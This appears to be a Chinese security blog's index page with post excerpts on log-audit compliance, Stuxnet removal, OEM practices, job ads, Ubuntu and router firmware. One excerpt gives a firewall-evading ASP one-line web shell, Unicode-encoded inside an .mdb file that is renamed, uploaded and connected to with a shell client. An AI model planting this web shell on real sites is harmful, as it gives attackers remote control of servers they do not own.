游侠安全网

　　游侠单位限制了上传速率，每个人15KB，最近习惯用旋风下载（主要是因为速度快、无广告），但是莫名其妙的发现网速变慢了，打开360流量监控看看，居然……

　　明明没有任何下载任务，还是在给我上传！
　　瞎搞的不仅是QQ，连QQDownload也沦陷了！Dog Sun's Tencent !

　　内控合规需求分析

　　当今的证券行业在IT信息安全领域面临比以往更为复杂的局面，日益迫切的信息系统审计和内控、以及持续增强的业务持续性需求，对证券行业的日志审计提出了明确的要求：

　　1) 《证券公司内部控制指引》第一百一十七条要求“证券公司应保证信息系统日志的完备性，确保所有重大修改被完整地记录，确保开启审计留痕功能”。

　　2) 证监会要求各证券单位“应建立对关键网络、安全设备和服务器日志定期检查和分析的制度。各单位应定期人工或采取软件分析方式对关键网络设备、安全设备和服务器日志进行检查和详尽的分析，通过定期对日志进行分析和总结，及时了解网络状况、设备运行状况，发现薄弱环节，及时整改，形成记录”。
...

　　月球是地球的唯一天然卫星，它与地球有着密切的演化联系。月球是人类走向太空的第一步，因此登陆月球也一直是我们中华民族的梦想，随着嫦娥二号的顺利升空，我们又离这一目标更近了一步。

　　10月1日嫦娥二号火箭顺利点火升空，截止现在，嫦娥二号已经制动成功，进入100公里工作轨道，嫦娥二号将拍摄月球表面影象、获取极区表面数据，为嫦娥三号在月球软着陆做好准备。

　　嫦娥探月工程是一项庞大的工程，它不仅

　　“出埃及记”（Exodus）是讲述以色列建国的辛酸历史，气势宏大，雄壮，很有悲壮的历史感。在有关此钢琴曲的MTV中最有名的就是马克西姆版。MTV演奏者：马克西姆，英文名Maksim Mrvica，来自克罗地亚的欧洲新古典王子、钢琴圣手。“此曲中马克西姆充分展现他神奇魔幻的诠演才华，让音乐充满的无限的惊喜。

　　中科同向（HeartsOne Enterprises, Inc.）荣获中国电子信息产业发展研究院、中国计算机用户协会颁发的“2010 中国数据管理领域政府行业最具影响力品牌奖”。

　　中科同向是我国信息安全及数据存储备份与容灾行业研发最长、综合实力最强的企业之一。中科同向客户已遍及教育，金融，医药

　　据来自BitDefender中国的最新消息，BitDefender已发布了针对超级工厂病毒Stuxnet的专杀工具(Stuxnet国内译成“震网”、“超级病毒”或“超级工厂”，以下称“超级工厂”)。 BitDefender已于7月中旬截获Stuxnet蠕虫病毒，并将其命名为Win32.Worm.Stuxnet。该专杀工具可以完全清除目前所发现 的所有Stuxnet变种，当然也可以清除Stuxnet蠕虫残留在系统中的Rootkit驱动程序，所有安装BitDefender反病毒产品的用户将会受到保护。
...

不可否认，OEM扼杀了一部分创新
但是，也不可否认，OEM也养活了一些小型创新公司

现在很多厂家，OEM来OEM去
内部人士感觉这世界浮躁
用户也为此感觉摸不着头脑

不过，回头想想，其实让我们自己做公司的话
OEM也是不得不考虑的一条路

自主研发？养不起那么多研发
代理？又没有几块钱的利润，让人感觉层次还很低
于是……
大家都选择了“拿来主义”
今天修改LOGO，明天印刷个盒子，就能卖了

OEM也是合作的一种形式，并且能让中小型公司“看上去”更强悍
或者，让一些主要业务不在安全的公司，看上去“更茁壮”
...

　　Ubuntu Linux是一份基于 Debian 的、完整的桌面Linux操作系统，它启动速度超快、界面友好、安全性好，适用于桌面电脑、笔记本电脑、服务器以及上网本等，并且它可以永久免费使用。并带有社团及专业的支持应。使用者拥有定制及改变他们软件的自由，这包括以任何他们认为适宜的方式。 Ubuntu 每六个月发布一个新版本。代号为Maverick Meerkat的ubuntu 10.10已经正式发布，各版本下载地址如下：
　　下载:Ubuntu 10.10 (Maverick Meerkat)

Java高级开发
岗位职责：
1、根据公司产品或项目具体要求，承担开发任务，按计划完成任务目标；
2、配合系统分析人员完成软件系统及模块的需求调研与需求分析；
3、配合系统分析人员完成软件系统及模块的设计；
4、独立完成软件系统及模块的编码；
5、协助测试人员完成软件系统及模块的测试；
6、负责编制与产品或项目相关的技术文档；
任职要求：
1、计算机或相关专业本科及本科以上学历；
2、精通Java语言，2年以上Java软件开发经验，精通J2SE、J2EE，精通Spring,hibernate等相关技术，并熟练掌握一种Java开发框架；
...

售前工程师
1. 本科以上学历，2年以上售前工作经历；
2. 熟悉主流操作系统、数据库、网络设备的使用及安全技术； 至少精通一种*nix类操作系统或数据库；
3. 熟悉信息安全审计技术；
4. 具备良好的文档编写能力及表达能力；
5. 工作态度严谨细致，责任心强；
6. 能适应频繁出差；
7. 持有CISP、CISA、CISSP等证书者优先；

技术支持工程师
1. 专科以上学历；
2. 熟悉常见的操作系统(Linux、Windows)；
3. 了解对主流数据库系统的基本使用；
4. 熟悉安全攻防技术者最佳；
...

现在有不少服务器加了web的防火墙，用来过滤含asp/jsp/php的网马代码，全部用空格替换，
比较讨厌，不过后来刚好想到以前的一句话时候的unicode编码，那就也搞一个吧。

1.新建一个mdb
2.建表，考入：┼攠數畣整爠煥敵瑳∨≡┩> nbsp;
　（实际是<% execute request("a")%>）
3.改后缀为asp/asa
4.上传
5.一句话客户端或者菜刀连接

FROM http://hi.baidu.com/it_security/blog/item/976f6ddbbce719d5b6fd4882.html...

　　其实一些研究所自己做产品，已经不是新鲜事了。

　　大家所熟知的：兵器工业集团信息中心，不但做大家所熟知的通达OA，还有通达监控卫士、深度保密检查工具，在兵器工业集团内部做的非常好。当然，这几个产品在社会上也做的非常好。

　　另外，游侠知道的，很多研究所（航空、航天、兵器、电子、甚至军队、高校）都有个三产公司在做此类产品，上海、武汉、深圳等都有这样的公司。或者和安全公司合作，或者直接自己从零开始。

　　其实，甲方自己做这个是有好处的：安全公司只能做“基本上适合所有人”的产品，而他们不一样，他们完全可以按照自己的业务流程去开发安全产品。而这一点，外面的安全公司是不好做的。
...

　　新做的数据库审计专题，URL是：DBAudit.YouXia.Org

　　主要提供：数据库审计资讯、数据库审计产品、数据库审计厂家、数据库审计技术文章等，如果厂家乐意，也可能会放数据库审计产品的技术白皮书、宣传PPT等，希望得到各厂家、从业人员、爱好者的支持。

　　其实在 www.youxia.org 也有不少数据库审计的咨询，但是毕竟，搜来搜去的，不那么方便。干脆重新做一个数据库审计的专题，以后关于数据库审计的信息会都发在 http://dbaudit.youxia.org 当然，在 www.youxia.org 也会有，但是这个专题，作为一个数据库审计的专门的页面，会更加专业。

　　如果您乐意在本站推广您的产品或分享您的技术，请联系站长 张百川（网路游侠）QQ：55984512 或 55984512。

本来是watercloud发在华安论坛的，游侠也和几个知道创宇的朋友聊得来，转发下
知道创宇是专心做技术的个公司，招人不要求学历、性别、年龄，值得尊重

我们是：
北京知道创宇信息技术有限公司，一家小公司，你多半没有听说过……
公司网站在这里：www.knownsec.com
我们成立时间不长，追求卓越的WEB安全技术，致力于为网站提供安全产品和SAAS服务，让网站更安全，让网民能安心享受互联网。我们是国内唯一一家美国微软安全服务提供商，也是CNCERT国家漏洞平台支撑单位。你可以google搜索 knownsec 或 知道创宇 来更好的了解我们
...

近期发现MW54R无线路由器经常性down机，重启后还是连不上，必须重新启动一次才行，于是网上搜了下，发现有人说这个路由器某些固件是如此的，于是升级到4.6.6 Build 100625 Rel.55083n版本，说这个版本没问题。我也下载了个，升级了。